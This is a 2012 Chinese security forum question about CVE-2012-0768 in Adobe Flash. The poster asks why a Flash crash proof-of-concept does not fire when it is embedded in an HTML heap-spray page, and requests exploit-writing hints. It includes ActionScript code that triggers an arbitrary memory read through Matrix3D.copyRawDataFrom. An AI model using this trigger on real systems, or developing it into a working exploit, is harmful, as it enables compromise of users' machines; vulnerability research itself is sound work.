-
-
flash拖入IE和html文件调用flash有区别吗?
-
发表于:
2012-9-13 14:45
3672
-
flash拖入IE和html文件调用flash有区别吗?
在看CVE-2012-0768
不知道怎么利用
所以想看看heap spray是不是能搞
但是自己不知道AS语言里面怎么去喷
只好随手拿一个JS的spray页面,在里面写了行代码来调用这个flash。
后来发现打开html页面后,flash一直处于载入中,就是不触发异常,下的断点根本没走。
么有搞过,不懂咋回事,求大牛解释。
最好提示下这个漏洞怎么写exploit。纯研究学习,不做坏事。
flash脚本===============
// Compile with: mxmlc -static-rsls repro_b.as
package {
import flash.display.*;
import flash.geom.*;
import __AS3__.vec.*;
public class repro_b extends Sprite {
public function repro_b() {
var _local9:* = new Matrix3D();
// The second parameter - "index" - is added to the base address of the
// empty vector object and used as a read pointer. This allows arbitrary addresses
// to be read into the destination matrix.
var _local10:* = _local9.copyRawDataFrom(new Vector.<Number>(), 0x10000000);
}
}
}
html==================
<object type="application/x-shockwave-flash" data="/repro_b.swf" width="100%" height="100%" id="gotoV5Flash" style="visibility: visible; "></object>
[课程]FART 脱壳王!加量不加价!FART作者讲授!